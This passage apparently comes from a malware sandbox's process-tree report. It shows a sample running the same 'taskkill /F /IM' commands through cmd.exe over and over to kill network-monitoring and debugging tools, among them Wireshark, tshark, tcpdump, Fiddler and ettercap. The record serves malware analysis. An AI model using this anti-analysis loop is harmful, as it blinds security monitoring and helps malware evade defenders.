C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:5076

C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
7⤵
PID:2744

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
6⤵
PID:5096

C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
7⤵
PID:376

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
6⤵
PID:5064

C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
7⤵
PID:676

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
6⤵
PID:1836

C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
7⤵
PID:2056

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
6⤵
PID:1568

C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
7⤵
PID:3804

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
6⤵
PID:1132

C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
7⤵
PID:4380

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
6⤵
PID:1752

C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
7⤵
PID:4252

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
6⤵
PID:2204

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:2968

C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
7⤵
PID:836

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
6⤵
PID:4184

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:2388

C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
7⤵
PID:4496

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
6⤵
PID:2732

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:4280

C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
7⤵
PID:3388

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
6⤵
PID:3916

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:1176

C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
7⤵
PID:1788

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
6⤵
PID:2948

C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
7⤵
PID:2216

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
6⤵
PID:1068

C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
7⤵
PID:4528

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
6⤵
PID:4416

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:3960

C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
7⤵
PID:3380

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
6⤵
PID:376

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:4924

C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
7⤵
PID:4316

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
6⤵
PID:676

C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
7⤵
PID:2116

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
6⤵
PID:5008

C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
7⤵
PID:832

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
6⤵
PID:3804

C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
7⤵
PID:3052

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
6⤵
PID:372

C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
7⤵
PID:3420

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
6⤵
PID:4364

C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
7⤵
PID:4564

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
6⤵
PID:2688

C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
7⤵
PID:4972

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
6⤵
PID:2204

C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
7⤵
PID:4500

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
6⤵
PID:3716

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:3096

C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
7⤵
PID:1980

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
6⤵
PID:2976

C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
7⤵
PID:1216

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
6⤵
PID:4424

C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
7⤵
PID:1304

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
6⤵
PID:4220

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:2172

C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
7⤵
PID:4332

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
6⤵
PID:404

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:3688

C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
7⤵
PID:1908

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
6⤵
PID:1360

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:3316

C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
7⤵
PID:1588

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
6⤵
PID:4644

C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
7⤵
PID:4860

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
6⤵
PID:5112

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:1644

C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
7⤵
PID:3616

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
6⤵
PID:1836

C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
7⤵
PID:3052

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
6⤵
PID:3028

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:2988

C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
7⤵
PID:3420

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
6⤵
PID:3404

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:3396

C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
7⤵
PID:3484

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
6⤵
PID:2956

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:216

C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
7⤵
PID:5016

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
6⤵
PID:2312

C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
7⤵
PID:2496

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
6⤵
PID:2472

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:716

C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
7⤵
PID:1468

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
6⤵
PID:2304

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:2076

C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
7⤵
PID:2568

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
6⤵
PID:2920

C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
7⤵
PID:3676

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
6⤵
PID:1776

C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
7⤵
PID:1840

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
6⤵
PID:3112

C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
7⤵
PID:4220

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
6⤵
PID:3120

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:1984

C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
7⤵
PID:4932

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
6⤵
PID:376

C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
7⤵
PID:1360

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
6⤵
PID:4024

C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
7⤵
PID:3600

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
6⤵
PID:2832

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:2072

C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
7⤵
PID:4460

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
6⤵
PID:4204

C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
7⤵
PID:2408

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
6⤵
PID:4012

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:3612

C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
7⤵
PID:2160

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
6⤵
PID:4732

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:4564

C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
7⤵
PID:3404

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
6⤵
PID:4736

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:1596

C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
7⤵
PID:2956

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
6⤵
PID:1680

C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
7⤵
PID:2312

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
6⤵
PID:1980

C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
7⤵
PID:2320

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
6⤵
PID:4372

C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
7⤵
PID:3716

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
6⤵
PID:3916

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:3764

C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
7⤵
PID:1768

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
6⤵
PID:2036

C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
7⤵
PID:2744

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
6⤵
PID:4864

C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
7⤵
PID:4580

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
6⤵
PID:1908

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:3120

C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
7⤵
PID:4924

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
6⤵
PID:376

C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
7⤵
PID:4300

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
6⤵
PID:5064

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:4024

C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
7⤵
PID:5024

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
6⤵
PID:3616

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:2072

C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
7⤵
PID:2408

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
6⤵
PID:384

C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
7⤵
PID:2160

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
6⤵
PID:3296

C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
7⤵
PID:3604

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
6⤵
PID:4232

C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
7⤵
PID:2536

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
6⤵
PID:4972

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:4500

C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
7⤵
PID:2496

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
6⤵
PID:4496

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:1468

C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
7⤵
- Kills process with taskkill
PID:2320

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
6⤵
PID:2388

C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
7⤵
PID:2684

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
6⤵
PID:3096

C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
7⤵
PID:3128

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
6⤵
PID:2976

C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
7⤵
PID:2172

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
6⤵
PID:2036

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:1304

C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
7⤵
PID:4932

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
6⤵
PID:4864

C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
7⤵
PID:4976

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
6⤵
PID:5048

C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
7⤵
PID:464

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
6⤵
PID:376

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:4316

C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
7⤵
PID:4352

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
6⤵
PID:3836

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:3804

C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
7⤵
- Kills process with taskkill
PID:832

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
6⤵
PID:2112

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:3468

C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
7⤵
PID:2060

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
6⤵
PID:2212

C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
7⤵
PID:3604

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
6⤵
PID:2504

C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
7⤵
PID:2536

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
6⤵
PID:4920

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:4308

C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
7⤵
PID:2476

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
6⤵
PID:1020

C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
7⤵
PID:3568

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
6⤵
PID:4836

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:4372

C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
7⤵
PID:3668

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
6⤵
PID:4516

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:3916

C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
7⤵
PID:2668

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
6⤵
PID:3764

C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
7⤵
PID:1332

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
6⤵
PID:4332

C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
7⤵
PID:5116

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
6⤵
PID:3112

C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
7⤵
PID:4864

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
6⤵
PID:1008

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:4644

C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
7⤵
PID:5048

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
6⤵
PID:3976

C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
7⤵
PID:4744

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
6⤵
PID:1568

C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
7⤵
PID:1972

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
6⤵
PID:4048

C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
7⤵
PID:4012

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
6⤵
PID:4928

C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
7⤵
PID:4252

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
6⤵
PID:556

C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
7⤵
PID:4736

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
6⤵
PID:3560

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:1752

C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
7⤵
PID:4920

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
6⤵
PID:3292

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:4084

C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
7⤵
PID:1980

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
6⤵
PID:2076

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:2568

C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
7⤵
PID:3716

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
6⤵
PID:3676

C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
7⤵
PID:4448

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
6⤵
PID:5076

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:2976

C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
7⤵
PID:1776

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
6⤵
PID:404

C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
7⤵
PID:3380

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
6⤵
PID:4588

C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
7⤵
PID:1572

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
6⤵
PID:2612

C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
7⤵
PID:1908

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
6⤵
PID:3896

C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
7⤵
PID:2264

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
6⤵
PID:1972

C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
7⤵
PID:384

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
6⤵
PID:2020

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:372

C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
7⤵
PID:2448

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
6⤵
PID:3612

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:4460

C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
7⤵
PID:2212

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
6⤵
PID:3604

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:5016

C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
7⤵
PID:4736

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
6⤵
PID:4364

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:4232

C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
7⤵
- Kills process with taskkill
PID:4920

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
6⤵
PID:2476

C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
7⤵
PID:3568

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
6⤵
PID:5012

C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
7⤵
PID:4836

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
6⤵
PID:4184

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:1216

C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
7⤵
PID:4724

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
6⤵
PID:3128

C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
7⤵
- Kills process with taskkill
PID:3960

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
6⤵
PID:5076

C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
7⤵
PID:4924

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
6⤵
PID:4932

C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
7⤵
PID:4148

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
6⤵
PID:1588

C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
7⤵
PID:1908

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
6⤵
PID:724

C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
7⤵
PID:3016

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
6⤵
PID:1512

